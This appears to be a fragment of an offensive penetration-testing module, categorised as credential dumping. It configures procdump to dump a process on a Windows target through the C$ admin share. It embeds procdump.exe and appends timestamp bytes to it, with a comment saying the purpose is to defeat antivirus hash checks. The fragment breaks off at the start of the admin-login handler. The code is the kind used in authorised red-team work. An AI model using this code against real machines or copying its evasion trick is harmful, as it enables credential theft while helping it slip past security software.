r""" TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\) PROCDUMP_PATH Path where procdump.exe is on your system (default: /tmp/), if changed embeded version will not be used PROCDUMP_EXE_NAME Name of the procdum
(self, context, module_options)
| 18 | category = CATEGORY.CREDENTIAL_DUMPING |
| 19 | |
| 20 | def options(self, context, module_options): |
| 21 | r""" |
| 22 | TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\) |
| 23 | PROCDUMP_PATH Path where procdump.exe is on your system (default: /tmp/), if changed embeded version will not be used |
| 24 | PROCDUMP_EXE_NAME Name of the procdump executable (default: procdump.exe), if changed embeded version will not be used |
| 25 | DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = PROCDUMP_PATH) |
| 26 | """ |
| 27 | self.tmp_dir = "C:\\Windows\\Temp\\" |
| 28 | self.share = "C$" |
| 29 | self.tmp_share = self.tmp_dir.split(":")[1] |
| 30 | with open(join(DATA_PATH, "procdump/procdump.exe"), "rb") as f: |
| 31 | self.procdump_embeded = f.read() |
| 32 | self.procdump = "procdump.exe" |
| 33 | self.procdump_path = abspath(TMP_PATH) |
| 34 | self.dir_result = self.procdump_path |
| 35 | self.useembeded = True |
| 36 | # Add some random binary data to defeat AVs which check the file hash |
| 37 | self.procdump_embeded += datetime.now().strftime("%Y%m%d%H%M%S").encode() |
| 38 | |
| 39 | if "PROCDUMP_PATH" in module_options: |
| 40 | self.procdump_path = module_options["PROCDUMP_PATH"] |
| 41 | self.useembeded = False |
| 42 | |
| 43 | if "PROCDUMP_EXE_NAME" in module_options: |
| 44 | self.procdump = module_options["PROCDUMP_EXE_NAME"] |
| 45 | self.useembeded = False |
| 46 | |
| 47 | if "TMP_DIR" in module_options: |
| 48 | self.tmp_dir = module_options["TMP_DIR"] |
| 49 | |
| 50 | if "DIR_RESULT" in module_options: |
| 51 | self.dir_result = module_options["DIR_RESULT"] |
| 52 | |
| 53 | def on_admin_login(self, context, connection): |
| 54 | if self.useembeded is True: |